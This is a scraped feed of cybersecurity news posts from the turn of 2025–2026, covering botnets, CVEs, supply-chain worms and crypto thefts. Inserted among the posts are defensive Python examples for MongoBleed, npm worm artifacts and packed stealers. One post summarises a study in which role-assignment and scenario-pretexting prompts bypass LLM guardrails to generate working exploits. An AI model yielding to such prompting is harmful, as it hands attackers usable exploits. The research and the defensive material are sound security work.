"🚨 RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Breach Next.js Servers CloudSEK reports RondoDox began scanning for vulnerable Next.js hosts on Dec [--] and started deploying payloads days later, chaining single-request unauthenticated RCE into a botnet loader/health-checker, a cryptominer and a Mirai variant, while also removing competing malware and enforcing persistence via cron. 🕷 Malware: RondoDox (botnet) + Mirai variant + Coinminer 🎯 Target: Global/Next.js Web Servers + IoT (routers and connected devices) # Category: #RondoDox #React2Shell #CVE202555182 #Nextjs #RCE #Botnet"
X Link 2025-12-31T15:41Z [--] followers, [---] engagements
"🚨 Singapore CSA Warns of Maximum-Severity SmarterMail RCE Flaw (CVE-2025-52691) CSA issued an alert for CVE-2025-52691 (CVSS 10.0) where an unauthenticated attacker can upload arbitrary files to the mail server and potentially achieve remote code execution; affected SmarterMail Build [----] and earlier should be upgraded to Build [----] immediately. 🕷 Malware: N/A 🎯 Target: Singapore/Email Infrastructure (SmarterMail deployments) # Category: #CVE202552691 #SmarterMail #RCE #FileUpload #EmailSecurity #Vulnerability #PatchNow #CSA 🔗 URL:"
X Link 2025-12-31T15:58Z [--] followers, [---] engagements
"🚨 Hackers Drain $3.9M From Unleash Protocol After Multisig Governance Hijack Attackers gained enough signing power to act as an admin in Unleash's multisig governance, pushed an unauthorized contract upgrade and enabled illicit withdrawals of WIP/USDC/WETH and related assets; stolen funds were then bridged out and routed into Tornado Cash to reduce traceability. 🕷 Malware: N/A 🎯 Target: Global/DeFi (Unleash Protocol users and on-chain assets) # Category: #CryptoHack #DeFi #Multisig #SmartContracts #GovernanceAttack #ContractUpgrade #TornadoCash #IncidentResponse 🔗 URL:"
X Link 2025-12-31T17:04Z [--] followers, [--] engagements
"🚨 Trust Wallet Chrome Extension Hack Drains $8.5M After Shai-Hulud Supply-Chain Breach Trust Wallet says attacker-exposed GitHub secrets enabled theft of its Chrome Web Store API key, letting the actor publish a trojanized extension update (v2.68) that beaconed to attacker-controlled infrastructure and harvested wallet mnemonic phrases. About $8.5M was drained from [----] wallets, highlighting how developer-secret leakage can directly translate into consumer fund theft via compromised release pipelines. 🕷 Malware: Shai-Hulud (supply-chain worm) + trojanized Trust Wallet browser extension 🎯"
X Link 2025-12-31T18:05Z [--] followers, [--] engagements
"🚨 GlassWorm Pivots to macOS: Malicious VS Code Extensions Use Encrypted JS + Solana C2 GlassWorm's latest wave targets macOS developers via three Open VSX extensions using AES-256-CBC-encrypted payloads embedded in compiled JavaScript plus a 15-minute execution delay to evade sandboxes, then stealing Keychain data and persisting via LaunchAgents. The campaign also uses Solana transaction memos (base64 URLs) as decentralized C2 and is preparing wallet-focused trojanization against Ledger Live and Trezor Suite. 🕷 Malware: GlassWorm 🎯 Target: Global/Developers (macOS, Web3/Crypto ecosystems) #"
X Link 2025-12-31T18:09Z [--] followers, [--] engagements
"🚨 Researchers Show RSA Prompt Manipulation Can Turn Mainstream LLMs Into Exploit Generators A University of Luxembourg study shows attackers can use RSA (Role-assignment, Scenario-pretexting, Action-solicitation) to bypass LLM guardrails and generate working exploits from public CVE disclosures, achieving a reported 100% success rate against multiple Odoo ERP CVEs within [--] prompt rounds. This collapses the skill barrier for real compromise (DB exfiltration, backdoor creation, privilege escalation) and shortens defenders' effective patch window. 🕷 Malware: N/A (LLM manipulation technique: RSA) 🎯"
X Link 2025-12-31T18:16Z [--] followers, [--] engagements
"🚨 Two U.S. Cybersecurity Pros Plead Guilty as ALPHV/BlackCat Affiliates Ryan Goldberg (GA) and Kevin Martin (TX) admitted they used ALPHV/BlackCat's RaaS to extort U.S. victims in [----], including $1.2M in Bitcoin from one organization, then laundered proceeds while paying the gang a 20% cut. The case underscores the insider-risk reality that defender-grade skills can dramatically accelerate ransomware intrusion and extortion operations. 🕷 Malware: ALPHV/BlackCat ransomware 🎯 Target: USA/Multiple Sectors # Category: #Ransomware #ALPHV #BlackCat #CyberCrime #Extortion #InsiderThreat #DOJ"
X Link 2025-12-31T18:18Z [--] followers, [--] engagements
"🚨 Critical Apache StreamPipes Flaw Lets Low-Privilege Users Hijack Admin Accounts (CVE-2025-47411) Apache warns that StreamPipes 0.69.0–0.97.0 lets any authenticated non-admin abuse user-ID/JWT handling to impersonate an administrator and gain full platform control, enabling backdoor account creation, configuration tampering and streaming pipeline compromise. Patch by upgrading to 0.98.0 immediately. 🕷 Malware: N/A 🎯 Target: Global/Data Streaming & Analytics (Apache StreamPipes deployments) # Category: #Apache #StreamPipes #CVE202547411 #PrivilegeEscalation #JWT #Vulnerability #PatchNow"
X Link 2025-12-31T18:20Z [--] followers, [--] engagements
"🚨 GlassWorm Worm Spreads via Malicious VS Code Extensions to Hit macOS Developers GlassWorm is propagating through Open VSX extensions using AES-encrypted JavaScript that sleeps [--] minutes to evade sandboxes, then pulls Solana blockchain-based C2 to run commands and steal macOS Keychain data. The campaign also contains code to trojanize Ledger Live/Trezor Suite, making developer machines a high-value pivot into both enterprise credentials and crypto assets. 🕷 Malware: GlassWorm 🎯 Target: Global/macOS Developers (VS Code + Open VSX; Web3 users at higher risk) # Category: #GlassWorm"
X Link 2025-12-31T18:21Z [--] followers, [--] engagements
"🚨 Ivanti EPMM Zero-Days Turn Mobile MDM Into an Enterprise-Wide C2 Ivanti EPMM's spring [----] zero-day chain (CVE-2025-4427 + CVE-2025-4428) was weaponized against thousands of orgs, especially in Europe, letting attackers pivot from an internet-facing MDM server into enrolled phones, directory data and even cloud tokens (M365/Google Workspace/Salesforce). The case shows how legitimate admin features in endpoint management platforms can become stealth intrusion tooling without deploying custom malware. 🕷 Malware: N/A (tooling observed: FRP reverse-proxy) 🎯 Target: Global (notably"
X Link 2025-12-31T18:51Z [--] followers, [--] engagements
"🚨 Apache StreamPipes Flaw Lets Any User Become Admin (CVE-2025-47411) A critical auth design failure in StreamPipes lets any authenticated low-privilege user tamper with JWT identity (e.g. swap their username to an existing admin) and instantly gain full administrative control across versions 0.69.0–0.97.0; attackers can then alter pipelines, access sensitive operational/business data and establish persistence. Upgrade to 0.98.0 immediately and audit admin accounts and recent auth logs for suspicious token activity. 🕷 Malware: N/A 🎯 Target: Global/Enterprises Using Apache StreamPipes (Data"
X Link 2025-12-31T19:51Z [--] followers, [--] engagements
"🚨 Microsoft Teams Goes Secure by Default on Jan [--] [----] (Risky Files + Malicious Links Blocked) Microsoft will automatically enable three messaging protections for tenants on standard configurations: blocking weaponizable file types, real-time malicious URL detection with user warnings, and a false-positive reporting loop, raising baseline defenses against phishing and malware delivered through collaboration chats. 🕷 Malware: N/A 🎯 Target: Global/Enterprises Using Microsoft Teams # Category: #Microsoft #Teams #SecureByDefault #Phishing #Malware #URLFiltering #CollaborationSecurity #M365"
X Link 2025-12-31T20:51Z [--] followers, [--] engagements
"🚨 NYC Mayoral Inauguration Bans Flipper Zero and Raspberry Pi Devices New York City's [----] mayoral inauguration FAQ explicitly bans Flipper Zero and Raspberry Pi devices, singling them out alongside traditional prohibited items despite laptops and phones not being listed. The move reflects growing public-event concern over wireless/hacking-capable gear, but also highlights misunderstanding of real capability and risk, since more powerful devices remain allowed. 🕷 Malware: N/A 🎯 Target: USA/Public Events & Physical Security # Category: #FlipperZero #RaspberryPi #PhysicalSecurity #EventSecurity"
X Link 2025-12-31T23:52Z [--] followers, [--] engagements
"🚨 RondoDox Botnet Exploits React2Shell (CVE-2025-55182) to Hijack Next.js Servers and IoT Devices A nine-month RondoDox campaign is now exploiting the critical React2Shell RCE in Next.js/React Server Components to mass-compromise exposed systems (90K still vulnerable), dropping crypto-miners, a botnet loader/health-checker and a Mirai variant while killing competing malware and persisting via cron. 🕷 Malware: RondoDox + Mirai variant + Coinminer 🎯 Target: Global/Web Servers (Next.js) + IoT (heaviest exposure in USA) # Category: #RondoDox #Botnet #React2Shell #CVE202555182 #Nextjs #RCE #Mirai"
X Link 2026-01-01T10:55Z [--] followers, [--] engagements
"🚨 WhatsApp Backup Decryption Made Simple: wa-crypt-tools Supports .crypt12/.crypt14/.crypt15 Open-source wa-crypt-tools decrypts and (beta) re-encrypts WhatsApp/WhatsApp Business backup files when you provide the key, converting encrypted backups into readable SQLite/ZIP artifacts for DFIR and recovery workflows. 🕷 Malware: N/A 🎯 Target: Global/Mobile Forensics & WhatsApp Backups # Category: #WhatsApp #MobileForensics #DFIR #Encryption #E2EE #IncidentResponse #DigitalForensics #Tooling 🔗 URL: https://cybersecuritynews.com/whatsapp-crypt-tool/"
X Link 2026-01-01T10:57Z [--] followers, [--] engagements
"🚨 87000+ internet-exposed MongoDB servers still at risk from MongoBleed (CVE-2025-14847) Shadowserver telemetry shows tens of thousands of publicly reachable MongoDB instances remain unpatched, leaving them susceptible to unauthenticated memory-leak extraction that can expose credentials, API keys and other sensitive in-memory data. With active exploitation and CISA KEV listing, this is a high-urgency patch-and-exposure-reduction issue for any self-managed MongoDB deployment. 🕷 Malware: N/A 🎯 Target: Global / Databases (MongoDB) # Category: #MongoDB #MongoBleed #CVE202514847 #Vulnerability"
X Link 2026-01-01T11:32Z [--] followers, [--] engagements
"🚨 Malicious Featured Chrome extensions with 900K installs siphon ChatGPT/DeepSeek chats Researchers found two AITOPIA lookalike Chrome extensions (one even Google Featured) that scrape ChatGPT/DeepSeek conversations from the page DOM, harvest active-tab URLs and session tokens, then exfiltrate data every [--] minutes (Base64) to attacker-controlled infrastructure (e.g. deepaichats.com, chatsaigpt.com). The campaign shows how trusted extension permissions can quietly turn AI prompts/responses (often containing sensitive corporate data) into a high-value leakage channel. 🕷 Malware: N/A (Malicious"
X Link 2026-01-01T11:34Z [--] followers, [--] engagements
"🚨 DarkSpectre Zoom Stealer browser extensions exposed 2.2M users' meeting intelligence A cluster of malicious Chrome/Edge/Firefox extensions (often disguised as legitimate productivity tools) silently scraped conferencing data across Zoom, Microsoft Teams, Google Meet, Webex and others, then exfiltrated meeting URLs, attendee/speaker details, registration info and related assets via persistent WebSocket streams to attacker infrastructure, turning browser add-ons into a scalable corporate surveillance channel. 🕷 Malware: Zoom Stealer (DarkSpectre extension ecosystem) 🎯 Target: Global / Enterprise"
X Link 2026-01-01T11:36Z [--] followers, [--] engagements
"🚨 Bluetooth exploit toolkit released for Airoha headphone flaws impacting major brands Researchers published full technical details and a testing toolkit for three Airoha-based Bluetooth vulnerabilities (CVE-2025-20700/20701/20702) that can be abused by an attacker within Bluetooth range to eavesdrop, tamper with firmware and impersonate headphones to hijack smartphone connections. 🕷 Malware: N/A 🎯 Target: Global / Consumer Electronics (Bluetooth Headphones) # Category: #Bluetooth #Airoha #CVE202520700 #CVE202520701 #CVE202520702 #FirmwareSecurity #WirelessSecurity #IoT 🔗 URL:"
X Link 2026-01-01T11:38Z [--] followers, [--] engagements
"🚨 MongoBleed (CVE-2025-14847) exploited in the wild: unauthenticated MongoDB memory-leak now weaponized Attackers can send crafted compressed messages that make MongoDB return uninitialized heap memory pre-auth, leaking secrets like passwords/API keys at scale; public exploit code is already circulating and real-world incidents have been reported. Patch immediately (8.2.3/8.0.17/7.0.28/6.0.27/5.0.32/4.4.30) or temporarily disable zlib compression and remove MongoDB from direct internet exposure. 🕷 Malware: MongoBleed exploit (CVE-2025-14847) 🎯 Target: Global / Databases (MongoDB) #"
X Link 2026-01-01T11:42Z [--] followers, [--] engagements
"🚨 Ubisoft shuts down Rainbow Six Siege & marketplace after apparent backend compromise Ubisoft took Rainbow Six Siege offline and halted its marketplace after reports of unauthorized bans, inventory manipulation and massive in-game currency anomalies, while rolling back transactions since 11:00 UTC as a containment step. Unverified claims suggest attackers may have pivoted from an exposed/misconfigured MongoDB (possibly via MongoBleed) into internal repos and backend tooling, raising concerns about broader code/asset exposure and follow-on account phishing. 🕷 Malware: N/A 🎯 Target: Global /"
X Link 2026-01-01T11:45Z [--] followers, [---] engagements
"🚨 RondoDox botnet weaponizes React2Shell (CVE-2025-55182) to compromise Next.js servers CloudSEK reports active exploitation of the critical pre-auth RCE in React Server Components/Next.js, with RondoDox scanning for vulnerable servers and dropping botnet clients plus cryptominers, a loader/health-checker and a Mirai variant. The campaign blends rapid exploit-shotgun automation across web apps and IoT routers, making patching/mitigation urgent to prevent persistent footholds and resource hijacking. 🕷 Malware: RondoDox (Mirai variant + cryptominer payloads) 🎯 Target: Global / Next.js Web Apps"
X Link 2026-01-01T16:04Z [--] followers, [--] engagements
"🚨 Trust Wallet confirms second Shai-Hulud supply-chain hit after $8.5M crypto theft Attackers used leaked developer GitHub secrets and a stolen Chrome Web Store API key to publish a tampered Trust Wallet Chrome extension (v2.68) that exfiltrated sensitive wallet data on every unlock and routed it to attacker infrastructure (metrics-trustwallet.com), enabling wallet draining. Trust Wallet rolled back to a clean build, restricted publishing credentials, began fund-tracking with partners and committed to reimbursing affected users. 🕷 Malware: Shai-Hulud (supply-chain wallet drainer) 🎯 Target:"
X Link 2026-01-01T17:08Z [--] followers, [--] engagements
"🚨 MongoBleed lessons: Pre-auth MongoDB memory-leak (CVE-2025-14847) is being exploited in the wild MongoBleed abuses zlib message decompression before authentication to leak uninitialized heap memory (credentials, API keys, tokens, PII) from internet-exposed MongoDB servers, with public PoC and confirmed active exploitation. Key actions: patch/upgrade, remove direct internet exposure, disable zlib compression as a temporary mitigation and rotate secrets post-fix. 🕷 Malware: MongoBleed (CVE-2025-14847) exploit 🎯 Target: Global / MongoDB Databases (Internet-exposed) # Category: #MongoDB"
X Link 2026-01-02T09:14Z [--] followers, [--] engagements
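The post describes the bug class but not the check that closes it. The Python below is an added example, not code from the post, from MongoDB or from any PoC: it models a server that inflates an OP_COMPRESSED message before authentication and trusts the header's uncompressedSize field, beside a hardened version that bounds the inflate and rejects any size mismatch. Assumptions: that the leak is a mismatch between the claimed size and the bytes zlib actually produces (the usual shape of such bugs; the post only says "zlib message decompression before authentication"), the public MongoDB wire-protocol layout for OP_COMPRESSED, and a constructed STALE_HEAP byte string standing in for uninitialized memory.

```python
import struct
import zlib

# Public MongoDB wire-protocol constants: opcodes and the zlib compressor id.
OP_COMPRESSED = 2012
OP_MSG = 2013
COMPRESSOR_ZLIB = 2
HEADER_LEN = 16  # messageLength, requestID, responseTo, opCode (four int32)

# Constructed stand-in for whatever a previous request left behind in the heap.
STALE_HEAP = b"admin:S3cr3tP@ss|apikey=AKIA-EXAMPLE|"


def build_op_compressed(payload: bytes, claimed_size: int, request_id: int = 1) -> bytes:
    """Wrap a raw OP_MSG body in OP_COMPRESSED (zlib). A benign client passes the
    true length as claimed_size; a hostile one can claim more than it sends."""
    compressed = zlib.compress(payload)
    body = struct.pack("<iiB", OP_MSG, claimed_size, COMPRESSOR_ZLIB) + compressed
    header = struct.pack("<iiii", HEADER_LEN + len(body), request_id, 0, OP_COMPRESSED)
    return header + body


def parse_op_compressed(msg: bytes):
    """Split an OP_COMPRESSED message into (originalOpcode, uncompressedSize,
    compressorId, compressedBody) after basic framing checks."""
    msg_len, _req, _resp, opcode = struct.unpack_from("<iiii", msg, 0)
    if opcode != OP_COMPRESSED or msg_len != len(msg):
        raise ValueError("not a well-formed OP_COMPRESSED message")
    orig_opcode, uncompressed_size, compressor_id = struct.unpack_from("<iiB", msg, HEADER_LEN)
    if compressor_id != COMPRESSOR_ZLIB:
        raise ValueError("only zlib is modelled here")
    return orig_opcode, uncompressed_size, compressor_id, msg[HEADER_LEN + 9:]


def decompress_vulnerable(msg: bytes) -> bytes:
    """Size-trusting pattern: reserve uncompressedSize bytes, inflate into the
    front, return the whole reservation. The unused tail still holds STALE_HEAP,
    which is how an unauthenticated request ends up reading someone else's secrets."""
    _, claimed, _, compressed = parse_op_compressed(msg)
    reps = claimed // len(STALE_HEAP) + 1
    buf = bytearray((STALE_HEAP * reps)[:claimed])  # models an uninitialized reservation
    data = zlib.decompress(compressed)
    buf[:len(data)] = data  # only the bytes zlib actually produced are overwritten
    return bytes(buf)


def decompress_hardened(msg: bytes) -> bytes:
    """Bounded inflate plus an exact-length check: inflate at most claimed+1 bytes
    (so an over-long stream is detectable without a decompression bomb) and reject
    the message unless zlib produced exactly claimed bytes and reached end of stream."""
    _, claimed, _, compressed = parse_op_compressed(msg)
    if claimed <= 0:
        raise ValueError("uncompressedSize must be positive")
    d = zlib.decompressobj()
    data = d.decompress(compressed, claimed + 1)
    if len(data) != claimed or not d.eof:
        raise ValueError(f"declared {claimed} bytes, zlib produced {len(data)}")
    return data


def claims_match(msg: bytes) -> bool:
    """True when the message survives the hardened check; False means log and drop."""
    try:
        decompress_hardened(msg)
        return True
    except (ValueError, zlib.error):
        return False
```

The interim mitigation the post names (disabling zlib) maps to removing `zlib` from `net.compression.compressors` in mongod.conf (for example `snappy,zstd`) or from `--networkMessageCompressors`; clients that only offer zlib then fall back to uncompressed messages, which is the point. Rotating any credential that could have sat in the server's heap remains necessary after patching, because the hardened check only stops future reads.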
"🚨 Modified Shai-Hulud worm spotted on npm with heavier obfuscation and new exfil targets A newly observed Shai-Hulud variant was found embedded in the npm package @vietmoney/react-big-calendar, renaming core components (bun_installer.js / environment_source.js) and adding new secret-harvest artifacts (e.g. 3nvir0nm3nt.json, cl0vd.json, actionsSecrets.json) while changing its GitHub exfil tagging to Goldox-T3chs: Only Happy Girl. Analysts believe this is live operator iteration (improved TruffleHog handling, Windows bun.exe support, dead-man switch removed) but a coding mismatch (c0nt3nts.json vs"
X Link 2026-01-02T10:18Z [--] followers, [--] engagements
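A practical follow-up to the two Shai-Hulud posts above is a quick sweep of an installed dependency tree for the artifact names the post lists and for install-time lifecycle hooks, since a worm of this kind has to run at install. The Python below is an added example, not tooling from the post or from any vendor: it walks a directory, flags files named like the post's artifacts, and flags package.json install hooks that launch a local script, bun, or a downloader. The hook heuristic and the constructed sample tree (a fake @vietmoney/react-big-calendar beside a benign package) are assumptions for illustration, not a reference detector.

```python
import json
import os
import re
import tempfile

# Artifact names the post attributes to the modified worm.
WORM_FILES = {"bun_installer.js", "environment_source.js", "3nvir0nm3nt.json",
              "cl0vd.json", "actionsSecrets.json", "c0nt3nts.json"}
# Lifecycle hooks npm runs without user interaction during install.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Assumption: a hook that launches a local .js loader, bun, or a downloader deserves review.
SUSPICIOUS_HOOK = re.compile(r"\b(bun(\.exe)?|node\s+\S*\.js|curl|wget|powershell)\b", re.I)


def scan_package_tree(root: str) -> list[dict]:
    """Return one finding per suspicious file name or install hook under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name in WORM_FILES:
                findings.append({"path": path, "reason": f"worm artifact name {name}"})
            if name != "package.json":
                continue
            try:
                with open(path, encoding="utf-8") as fh:
                    pkg = json.load(fh)
            except (OSError, ValueError):
                continue  # unreadable or malformed manifest: nothing to inspect
            scripts = pkg.get("scripts") or {}
            for hook in INSTALL_HOOKS:
                cmd = scripts.get(hook)
                if isinstance(cmd, str) and SUSPICIOUS_HOOK.search(cmd):
                    findings.append({"path": path, "reason": f"{hook} hook runs: {cmd}"})
    return findings


def build_sample_tree() -> str:
    """Constructed node_modules layout shaped like the post's description; not a real package."""
    root = tempfile.mkdtemp(prefix="npm-scan-")
    bad = os.path.join(root, "node_modules", "@vietmoney", "react-big-calendar")
    good = os.path.join(root, "node_modules", "left-pad")
    os.makedirs(bad)
    os.makedirs(good)
    with open(os.path.join(bad, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "@vietmoney/react-big-calendar", "version": "0.0.0",
                   "scripts": {"preinstall": "node bun_installer.js"}}, fh)
    for name in ("bun_installer.js", "environment_source.js"):
        with open(os.path.join(bad, name), "w", encoding="utf-8"):
            pass
    with open(os.path.join(good, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "left-pad", "version": "1.3.0",
                   "scripts": {"test": "node test.js"}}, fh)
    return root


if __name__ == "__main__":
    for finding in scan_package_tree(build_sample_tree()):
        print(finding["reason"], "->", finding["path"])
```

Run it against a real checkout with `scan_package_tree("node_modules")`; pairing it with `npm install --ignore-scripts` in CI keeps hooks from firing while the sweep runs. A clean result says nothing about obfuscated payloads that use other names, so treat it as triage, not a verdict.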
"🚨 Covenant Health breach impacts [------] after Qilin ransomware data theft Covenant Health updated regulators that a May [----] intrusion attributed to the Qilin ransomware group exposed data for [------] individuals, including SSNs, insurance details and treatment information, after its investigation concluded months later. Qilin claims it stole 850GB and has reportedly published the data, indicating extortion pressure and elevated identity-theft risk. 🕷 Malware: Qilin (ransomware) 🎯 Target: USA / Healthcare # Category: #DataBreach #Ransomware #Qilin #Healthcare #PHI #PII #Extortion"
X Link 2026-01-02T11:20Z [--] followers, [--] engagements
"🚨 AI supercharged scams in 2025: voice clones, deepfakes and hyper-personalized social engineering Malwarebytes reports scammers are using AI to scale and personalize fraud with realistic text, cloned voices and synthetic video, making impersonation (from family to senior officials) far harder to spot and accelerating trust erosion in digital communications. The takeaway: verification by a second channel and tighter identity controls are now baseline defenses, not nice-to-haves. 🎯 Target: Global / Consumers & Organizations (Social Engineering) # Category: #AIScams #SocialEngineering #Deepfakes"
X Link 2026-01-02T11:23Z [--] followers, [--] engagements
"🚨 RondoDox botnet weaponizes React2Shell (CVE-2025-55182) to compromise Next.js servers SecurityWeek reports RondoDox operators actively exploit the pre-auth RCE flaw in React Server Components to enroll vulnerable Next.js servers, dropping a botnet framework that kills rival botnets/miners, establishes persistence and installs both a cryptominer and a Mirai variant. 🕷 Malware: RondoDox (drops cryptominer + Mirai variant) 🎯 Target: Global / Next.js Web Servers (AppSec) # Category: #React2Shell #CVE202555182 #Nextjs #React #Botnet #Mirai #Cryptomining #RCE #WebSecurity 🔗 URL:"
X Link 2026-01-02T12:26Z [--] followers, [--] engagements
"🚨 Fake Eternl Desktop wallet email targets Cardano users with stealthy remote-access installer A phishing campaign lures Cardano users to download a malicious Eternl.msi from a newly registered domain that drops GoTo/LogMeIn Resolve Unattended components (unattended-updater.exe) and writes unattended.json to enable persistent remote control. The installer then beacons to legitimate GoTo Resolve endpoints to exfil system telemetry and maintain access, setting victims up for follow-on credential theft and wallet draining. 🕷 Malware: GoTo/LogMeIn Resolve Unattended (abused RMM) 🎯 Target: Global"
X Link 2026-01-02T13:32Z [--] followers, [--] engagements
"🚨 Fintech Security 101: How to Protect Your Digital Wallet from Modern Fraud HackRead outlines core controls for wallet safety: strong authentication (MFA/biometrics), end-to-end encryption and continuous monitoring, while warning that phishing, device malware and public Wi-Fi remain the most common paths to account takeover and financial loss. 🎯 Target: Global / Fintech & Digital Wallet Users # Category: #Fintech #DigitalWallet #CyberSecurity #MFA #Encryption #Phishing #FraudPrevention #DataProtection 🔗 URL: https://hackread.com/protecting-digital-wallet-fintech-security/"
X Link 2026-01-03T00:16Z [--] followers, [--] engagements
"🚨 VVS Stealer hides behind PyArmor to dodge signatures and steal Discord + browser secrets VVS Stealer (a PyInstaller-packed Python infostealer) uses PyArmor (AES-CTR string/bytecode encryption + BCC/C-compiled functions) to frustrate static analysis while harvesting Discord tokens (DPAPI decryption + session injection) and browser credentials/cookies, and persisting via the Windows Startup folder. 🕷 Malware: VVS Stealer (VVS $tealer) 🎯 Target: Global / Windows (Discord users + browser data) # Category: #Infostealer #VVSstealer #Discord #PyArmor #PyInstaller #CredentialTheft #TokenTheft"
X Link 2026-01-03T09:47Z [--] followers, [--] engagements
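The post's static-analysis point (PyInstaller packing plus PyArmor protection) has a cheap first-pass counterpart: before reaching for an extractor, check whether a sample even carries a PyInstaller archive, which Python it was built for, and whether PyArmor runtime names and the behaviours the post lists (DPAPI, Discord LevelDB, Startup folder) appear as strings. The Python below is an added example, not the stealer's code or any vendor's tooling. It relies on the documented PyInstaller archive cookie (magic `MEI\014\013\012\013\016` followed by package length, TOC offset, TOC length, Python version and the Python library name) and on PyArmor's runtime identifiers; the behaviour regexes, the scoring threshold and the constructed sample blob are assumptions for illustration. PyArmor encrypts the code itself, so the strings it cannot hide are the loader's, which is why this works on the outer layer only.

```python
import re
import struct

# Documented PyInstaller CArchive cookie: magic + 4 big-endian uint32 + 64-byte pylib name.
PYINST_MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIII64s"
COOKIE_LEN = struct.calcsize(COOKIE_FMT)  # 88 bytes

# PyArmor runtime identifiers (v8 uses pyarmor_runtime/__pyarmor__, older builds pytransform).
PYARMOR_MARKERS = (b"pyarmor_runtime", b"__pyarmor__", b"pytransform")

# Assumption: string indicators for the behaviours the post describes.
BEHAVIOR_MARKERS = {
    "dpapi": re.compile(rb"CryptUnprotectData", re.I),
    "discord_leveldb": re.compile(rb"discord\\Local Storage\\leveldb", re.I),
    "startup_persistence": re.compile(rb"\\Start Menu\\Programs\\Startup", re.I),
}


def parse_pyinstaller_cookie(blob: bytes):
    """Locate the trailing archive cookie and decode it; None if absent/truncated."""
    idx = blob.rfind(PYINST_MAGIC)
    if idx < 0 or idx + COOKIE_LEN > len(blob):
        return None
    _magic, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, blob, idx)
    # Version is encoded as e.g. 311 for 3.11 (or 27 for 2.7 in very old builds).
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    return {"package_len": pkg_len, "toc_offset": toc_off, "toc_len": toc_len,
            "python": f"{major}.{minor}",
            "pylib": pylib.rstrip(b"\0").decode(errors="replace")}


def triage(blob: bytes) -> dict:
    """Score a sample on packing, PyArmor presence and behaviour strings."""
    cookie = parse_pyinstaller_cookie(blob)
    armor = [m.decode() for m in PYARMOR_MARKERS if m in blob]
    behaviors = [name for name, rx in BEHAVIOR_MARKERS.items() if rx.search(blob)]
    score = (2 if cookie else 0) + (2 if armor else 0) + len(behaviors)
    return {"pyinstaller": cookie, "pyarmor": armor, "behaviors": behaviors, "score": score,
            "verdict": "likely packed Python stealer" if score >= 4 else "inconclusive"}


def build_sample_blob() -> bytes:
    """Constructed stand-in for a packed sample: PE-ish head, loader strings, then the cookie."""
    body = (b"MZ\x90\x00" + b"\x00" * 64
            + b"pyarmor_runtime_000000\x00__pyarmor__\x00"
            + b"CryptUnprotectData\x00"
            + b"%APPDATA%\\discord\\Local Storage\\leveldb\x00"
            + b"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\updater.exe\x00"
            + b"\x00" * 32)
    cookie = struct.pack(COOKIE_FMT, PYINST_MAGIC, 4096, 128, 512, 311, b"python311.dll")
    return body + cookie


if __name__ == "__main__":
    print(triage(build_sample_blob()))
```

Knowing the Python version from the cookie matters in practice: the bundled .pyc files only decompile cleanly with a matching interpreter, and PyArmor-protected modules still need the runtime extracted alongside them, so the cookie is the first thing to read before any deeper work.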
"🚨 RondoDox Botnet Exploits React2Shell to Hijack 90K+ Exposed Next.js & IoT Devices RondoDox is actively exploiting the React2Shell flaw in Next.js (CVE-2025-55182) to mass-compromise routers, smart cameras and small business websites, with scans showing 90,300+ exposed systems. Post-compromise it drops a cryptominer (/nuts/poop), a Mirai variant (/nuts/x86) and a watchdog (/nuts/bolts) that kills competing malware every [--] seconds to keep exclusive control. 🕷 Malware: RondoDox (drops cryptominer + Mirai variant) 🎯 Target: Global / Next.js Websites + Routers & Smart Cameras # Category:"
X Link 2026-01-03T16:50Z [--] followers, [---] engagements
"🚨 Finland arrests Fitburg crew over suspected undersea cable sabotage Finnish police arrested two crew members and detained the full 14-person crew of the Fitburg after investigators found signs the ship dragged its anchor and damaged an undersea telecom cable linking Helsinki and Estonia. The case matters because Baltic subsea cables are treated as critical infrastructure and repeated hybrid disruption incidents can escalate regional security risk and telecom resilience costs. 🎯 Target: Finland/Telecom (Undersea Cable Infrastructure) # Category: #UnderseaCables #CriticalInfrastructure"
X Link 2026-01-03T22:06Z [--] followers, [--] engagements
"🚨 ShinyHunters claims Resecurity breach, firm says attackers only hit a monitored honeypot ShinyHunters posted Telegram screenshots alleging stolen internal chats, employee data, threat intel and client info, but Resecurity says the accessed environment was an isolated honeypot seeded with synthetic datasets to observe the actors' TTPs and infrastructure. Resecurity claims it logged extensive exfil automation via residential proxies and shared related telemetry with law enforcement. 🎯 Target: Global / Cybersecurity (Resecurity) # Category: #ShinyHunters #Resecurity #DataBreach #Honeypot"
X Link 2026-01-03T22:08Z [--] followers, [--] engagements
"🚨 Holiday-timed ColdFusion exploitation surge: GreyNoise spots coordinated scans hitting 10+ CVEs GreyNoise observed [----] malicious requests targeting 10+ Adobe ColdFusion flaws (2023-2024), peaking on Dec [--], with 98% of traffic coming from two Japan-hosted IPs and using Interactsh + JNDI/LDAP-style OAST verification, suggesting automated exploitation during reduced holiday monitoring. 🎯 Target: Global / Adobe ColdFusion Servers (Web & Enterprise Apps) # Category: #Adobe #ColdFusion #ExploitAttempts #Vulnerability #ThreatIntel #GreyNoise #RCE #LFI #AttackSurface 🔗 URL:"
X Link 2026-01-03T22:19Z [--] followers, [--] engagements
"🚨 Trump orders divestment of $2.9M Emcore chip assets from HieFo over China-linked control President Donald Trump issued an executive order forcing HieFo Corp. to divest Emcore's chip and indium-phosphide wafer-fab assets within [---] days, citing national security concerns and credible evidence the buyer is controlled by a Chinese citizen. The move follows a CFIUS review and highlights tighter U.S. scrutiny of even small semiconductor transactions tied to China. 🎯 Target: USA / Semiconductors & National Security # Category: #CFIUS #Semiconductors #NationalSecurity #ForeignInvestment"
X Link 2026-01-03T22:21Z [--] followers, [--] engagements
"🚨 Finland Seizes Fitburg as Undersea Cable Cut Triggers Sabotage Probe Finnish authorities detained the cargo ship Fitburg after a major fault severed an undersea data cable linking Helsinki and Estonia with investigators saying the vessel appeared to drag its anchor across the break site. Two crew members were arrested (two more travel-banned) and customs found sanctioned Russian steel on board escalating concerns the incident could be deliberate hybrid disruption of critical infrastructure. 🎯 Target: Finland & Estonia/Telecom # Category: #UnderseaCables #CriticalInfrastructure"
